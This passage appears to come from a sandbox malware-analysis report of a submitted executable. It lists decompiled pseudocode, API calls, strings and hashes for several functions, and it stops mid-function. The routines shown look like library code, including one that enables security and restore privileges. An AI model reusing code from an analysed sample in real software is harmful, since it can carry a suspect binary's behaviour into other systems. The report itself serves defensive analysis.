Opcode Fuzzy Hash: 81a7a9420184650dd13cd0bae2b6145ec6dd512740668d785bcf89191c8303a3
Instruction Fuzzy Hash: C7F0C830A0450CBBDB11AF55DC19B9DBFB8FF04715F10406AF809A6160EF358E40CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0006EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0006EB73(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00070085(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}

0x0006eb74
0x0006eb7a
0x0006eb81
0x0006eb86
0x0006eb8a
0x0006eb9f
0x0006eba2
0x0006eba8
0x0006eba8
0x0006ebab
0x00000000
0x0006ebab
0x0006ebb0

APIs

Part of subcall function 00070085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000700A0
Part of subcall function 00070085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0006EB86,Crypt32.dll,00000000,0006EC0A,?,?,0006EBEC,?,?,?), ref: 000700C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0006EB92
GetProcAddress.KERNEL32(000A81C0,CryptUnprotectMemory), ref: 0006EBA2

Strings

CryptProtectMemory, xrefs: 0006EB8C
Crypt32.dll, xrefs: 0006EB7C
CryptUnprotectMemory, xrefs: 0006EB98

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: b52b20bfe3c3174083059623e0faecf0510df64c8e03e67acd334ea56ddfddaf
Instruction ID: 2a603d7be3aea72027528124b7a97bc4c16f568feea70485d705213ec74578fd
Opcode Fuzzy Hash: b52b20bfe3c3174083059623e0faecf0510df64c8e03e67acd334ea56ddfddaf
Instruction Fuzzy Hash: C3E04F788007419EDF209F38D818B42BAE4AB14710F00D81EE5D6D7180D6B9D5409F50

Uniqueness

Uniqueness Score: -1.00%

Function 00087DD9 Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00087DD9(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x9e668; // 0x136d1c5
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E000873F2( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0007E531(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0007E531(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0007E531(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E0008B693(_t56);
						_t40 = E000884DE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E0008B693(_t56);
						E000884DE(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x9e668;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x00087dd9
0x00087de3
0x00087de7
0x00087de9
0x00087ded
0x00087df7
0x00087e08
0x00087e0d
0x00087e0f
0x00087e11
0x00087e13
0x00087e15
0x00087e19
0x00087ed3
0x00087ee1
0x00087ee3
0x00087ee8
0x00087eef
0x00087ef1
0x00087eff
0x00087f0e
0x00087f11
0x00087f13
0x00000000
0x00087f14
0x00087e21
0x00087e26
0x00087e2b
0x00087e2d
0x00087e2d
0x00087e2f
0x00087e34
0x00087e38
0x00087e38
0x00087e3b
0x00087e5a
0x00087e5a
0x00087e5c
0x00087e5f
0x00087e68
0x00087e6b
0x00087e70
0x00087e73
0x00087e78
0x00000000
0x00000000
0x00087e7a
0x00000000
0x00087e3d
0x00087e3d
0x00087e3f
0x00087e48
0x00087e4b
0x00087e50
0x00087e53
0x00087e58
0x00087e82
0x00087e85
0x00087e87
0x00087e8a
0x00087e92
0x00087e98
0x00087e9f
0x00087ea1
0x00087ea9
0x00087eb8
0x00087ebc
0x00087ebe
0x00087ec1
0x00000000
0x00000000
0x00087ec3
0x00087ec6
0x00087ec8
0x00087ec8
0x00087ec9
0x00087ecb
0x00087ece
0x00000000
0x00087ec8
0x00000000
0x00087e58
0x00087e3b
0x00000000

APIs

_free.LIBCMT ref: 00087E4B
_free.LIBCMT ref: 00087E6B

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: dcad190cfe3506c14f8798ea6210130614935e2b55426b6fdd863594d395f9b6
Instruction ID: bb8b294cf1b5d5c1cee83cc31af0486e2ff6d44daae225f1c1886ec7c3bff374
Opcode Fuzzy Hash: dcad190cfe3506c14f8798ea6210130614935e2b55426b6fdd863594d395f9b6
Instruction Fuzzy Hash: B8418432A003049BDB24EF78C881A9EB7E5FF89714B6545A9E559EB246DB31ED01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0008B610 Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0008B610() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E0008B5D9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00088518(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E000884DE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x0008b61f
0x0008b625
0x0008b67d
0x0008b67d
0x0008b627
0x0008b628
0x0008b62d
0x0008b636
0x0008b63c
0x0008b642
0x0008b647
0x00000000
0x0008b649
0x0008b64f
0x0008b654
0x0008b672
0x0008b66c
0x0008b66c
0x0008b66e
0x0008b66e
0x0008b675
0x0008b67a
0x0008b647
0x0008b681
0x0008b684
0x0008b684
0x0008b692

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0008B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0008B63C

Part of subcall function 00088518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0008C13D,00000000,?,000867E2,?,00000008,?,000889AD,?,?,?), ref: 0008854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0008B662
_free.LIBCMT ref: 0008B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0008B684

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: f38d35bcbfb79ae7f9f22b33dbcbaf1dd014865c7d5c9ab951723e2d96c23b44
Instruction ID: 2d0530d001de8a5ad6ae3648978b02863337e920989ec59b1a1cbd78b9e77a1f
Opcode Fuzzy Hash: f38d35bcbfb79ae7f9f22b33dbcbaf1dd014865c7d5c9ab951723e2d96c23b44
Instruction Fuzzy Hash: FD017172601615BB632126B66C8CCBF7AADFFC6BA4315022AB944C2111EF688D1197B4

Uniqueness

Uniqueness Score: -1.00%

Function 0007075B Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0007075B(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00091FA1);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00070A41(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E0007084E(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x0007075b
0x00070764
0x00070766
0x0007076b
0x0007076c
0x00070776
0x00070778
0x0007077d
0x0007077f
0x0007078f
0x0007079b
0x0007079d
0x000707a0
0x000707a2
0x000707a9
0x000707af
0x000707b0
0x000707b3
0x000707a0
0x000707c2
0x000707ce
0x000707da
0x000707e5
0x000707f0

APIs

Part of subcall function 00070A41: ResetEvent.KERNEL32(?), ref: 00070A53
Part of subcall function 00070A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00070A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0007078F
CloseHandle.KERNEL32(?,?), ref: 000707A9
DeleteCriticalSection.KERNEL32(?), ref: 000707C2
CloseHandle.KERNEL32(?), ref: 000707CE
CloseHandle.KERNEL32(?), ref: 000707DA

Part of subcall function 0007084E: WaitForSingleObject.KERNEL32(?,000000FF,00070A78,?), ref: 00070854
Part of subcall function 0007084E: GetLastError.KERNEL32(?), ref: 00070860

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 60c5254137dac681a359a1c2fdd244ff325979d72fc6231cb973977eb318df12
Instruction ID: 3531c43a69098b19d47e0227a638f4ea48c1328e302a9cc231fda4af8bc2533d
Opcode Fuzzy Hash: 60c5254137dac681a359a1c2fdd244ff325979d72fc6231cb973977eb318df12
Instruction Fuzzy Hash: F6019271944744EBC7219B69DC85FC6BBE9FB88710F00452AF15E82160CB796A44CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0008BF10 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0008BF10(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x9ed50; // 0x9ed44
					if(_t23 != 0) {
						E000884DE(_t7);
					}
					_t2 = _t21 + 4; // 0x732524
					_t24 =  *_t2 -  *0x9ed54; // 0xc1704
					if(_t24 != 0) {
						E000884DE(_t8);
					}
					_t3 = _t21 + 8; // 0x732540
					_t25 =  *_t3 -  *0x9ed58; // 0xc1704
					if(_t25 != 0) {
						E000884DE(_t9);
					}
					_t4 = _t21 + 0x30; // 0x4f0049
					_t26 =  *_t4 -  *0x9ed80; // 0x9ed48
					if(_t26 != 0) {
						E000884DE(_t10);
					}
					_t5 = _t21 + 0x34; // 0x4e
					_t6 =  *_t5;
					_t27 = _t6 -  *0x9ed84; // 0xc1708
					if(_t27 != 0) {
						return E000884DE(_t6);
					}
				}
				return _t6;
			}

0x0008bf16
0x0008bf1b
0x0008bf1f
0x0008bf25
0x0008bf28
0x0008bf2d
0x0008bf2e
0x0008bf31
0x0008bf37
0x0008bf3a
0x0008bf3f
0x0008bf40
0x0008bf43
0x0008bf49
0x0008bf4c
0x0008bf51
0x0008bf52
0x0008bf55
0x0008bf5b
0x0008bf5e
0x0008bf63
0x0008bf64
0x0008bf64
0x0008bf67
0x0008bf6d
0x00000000
0x0008bf75
0x0008bf6d
0x0008bf78

APIs

_free.LIBCMT ref: 0008BF28

Part of subcall function 000884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958), ref: 000884F4
Part of subcall function 000884DE: GetLastError.KERNEL32(00093958,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958,00093958), ref: 00088506

_free.LIBCMT ref: 0008BF3A
_free.LIBCMT ref: 0008BF4C
_free.LIBCMT ref: 0008BF5E
_free.LIBCMT ref: 0008BF70

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 72ac0a6d4f6d04ab8ea006d6cbeea0a25571c19b92e0646d9aa830e5f264b04d
Instruction ID: 3e631a682c8ac1824feaa37dd3d7d7a148ccb7dbd4e3be1325a2c39c15751247
Opcode Fuzzy Hash: 72ac0a6d4f6d04ab8ea006d6cbeea0a25571c19b92e0646d9aa830e5f264b04d
Instruction Fuzzy Hash: 85F01D33509241AB9660FB68EE86C5B73E9BB007107A4981AF188D7922CF34FC808F64

Uniqueness

Uniqueness Score: -1.00%

Function 000876BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E000876BD(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0008B290(_t52);
					GetModuleFileNameA(0, 0xc1130, 0x104);
					_t49 =  *0xc16e0; // 0x32232f0
					 *0xc16e8 = 0xc1130;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xc1130;
					}
					_v8 = 0;
					_v16 = 0;
					E000877E1(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00087956(_v8, _v16, 1);
					if(_t64 != 0) {
						E000877E1(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E0008ADA3(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xc16d4 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xc16d8 = _t59;
									L16:
									E000884DE(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xc16d4 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xc16d8 = _t43;
						goto L10;
					} else {
						_t44 = E0008895A();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E000884DE(_t64);
						return _t50;
					}
				} else {
					_t45 = E0008895A();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00088839();
					return _t65;
				}
			}

0x000876bd
0x000876ca
0x000876ea
0x000876fd
0x00087703
0x00087709
0x00087711
0x00087718
0x00087718
0x0008771d
0x00087724
0x0008772b
0x0008773d
0x00087744
0x00087763
0x0008776f
0x0008778a
0x0008778d
0x00087794
0x0008779a
0x000877a1
0x000877a4
0x000877a6
0x000877aa
0x000877b4
0x000877b4
0x000877b6
0x000877bc
0x000877bf
0x000877c1
0x000877c7
0x000877c8
0x000877ce
0x00000000
0x00000000
0x00000000
0x00000000
0x000877ac
0x000877ac
0x000877ac
0x000877af
0x000877b0
0x00000000
0x000877ac
0x0008779c
0x00000000
0x0008779c
0x00087775
0x0008777a
0x0008777c
0x0008777e
0x00000000
0x00087746
0x00087746
0x0008774b
0x0008774d
0x0008774e
0x00087783
0x00087783
0x000877d1
0x000877d2
0x00000000
0x000877db
0x000876d2
0x000876d2
0x000876d9
0x000876da
0x000876dc
0x00000000
0x000876e1

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\cDouNOFXle.exe,00000104), ref: 000876FD
_free.LIBCMT ref: 000877C8
_free.LIBCMT ref: 000877D2

Strings

C:\Users\user\Desktop\cDouNOFXle.exe, xrefs: 000876F4, 000876FB, 0008772A, 00087762

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\cDouNOFXle.exe
API String ID: 2506810119-2683366423
Opcode ID: 8ac6ca3dc8d74d61f2d35263dae2115e1c2c465d7b2f127f6595e2f63f8254fa
Instruction ID: cbbee5e23bdcc0ece77128fb4d46a60c1df4b031e635d9ce0b48574411a036b0
Opcode Fuzzy Hash: 8ac6ca3dc8d74d61f2d35263dae2115e1c2c465d7b2f127f6595e2f63f8254fa
Instruction Fuzzy Hash: A6316175A08218AFDB21FF99DD85DDEBBECFB85710B244066E48897216D6708E40CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00067574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00067574(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E0007E28C(E00091F37, _t61);
				E0007E360();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00063B3D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xa0eb2 == 0) {
						if(E00067BF5(L"SeSecurityPrivilege") != 0) {
							 *0xa0eb1 = 1;
						}
						E00067BF5(L"SeRestorePrivilege");
						 *0xa0eb2 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xa0eb1 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xc2000() == 0) {
						if(E0006B66C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00061F94(_t70, 0x52, _t54 + 0x24,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E0007F190(_t32);
							if(_t32 == 5 && E00070020() == 0) {
								E0006156B(_t61 - 0x6c, 0x18);
								E00070E37(_t61 - 0x6c);
							}
							E00066FC6(0xa0f50, 1);
						} else {
							_t39 =  *0xc2000(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E000615A0(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}

0x00067574
0x00067574
0x00067574
0x00067579
0x00067583
0x0006758b
0x0006758e
0x00067591
0x00067594
0x00067597
0x0006759a
0x0006759f
0x000675a0
0x000675a1
0x000675a7
0x000675af
0x000675bc
0x000675ca
0x000675cc
0x000675cc
0x000675d8
0x000675dd
0x000675dd
0x000675eb
0x000675ee
0x000675ef
0x000675f3
0x000675f3
0x000675f4
0x000675f5
0x000675f8
0x000675f9
0x000675fa
0x00067605
0x0006761d
0x00067632
0x0006763b
0x00067640
0x0006764f
0x00067657
0x00067667
0x0006766f
0x0006766f
0x00067678
0x0006761f
0x00067628
0x0006762e
0x00067630
0x00000000
0x00000000
0x00067630
0x0006761d
0x0006767e
0x00067682
0x0006768b
0x00067695

APIs

__EH_prolog.LIBCMT ref: 00067579

Part of subcall function 00063B3D: __EH_prolog.LIBCMT ref: 00063B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00067640

Part of subcall function 00067BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00067C04
Part of subcall function 00067BF5: GetLastError.KERNEL32 ref: 00067C4A
Part of subcall function 00067BF5: CloseHandle.KERNEL32(?), ref: 00067C59

Strings

SeRestorePrivilege, xrefs: 000675D3
SeSecurityPrivilege, xrefs: 000675BE

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 330420fc3d194314ffa4691dfb7a2ed1ec7cd8db4586bb286793b62a219d926c
Instruction ID: 19f2cb75542e8ffd9d7b798506bd4b736179ca32623a6da2b311d93eec598827
Opcode Fuzzy Hash: 330420fc3d194314ffa4691dfb7a2ed1ec7cd8db4586bb286793b62a219d926c
Instruction Fuzzy Hash: 3631DB71D04648AEEF60EB64DC05FEEBBBAAF15358F008055F449A7153DBB84944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0007A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0007A430(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t19;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
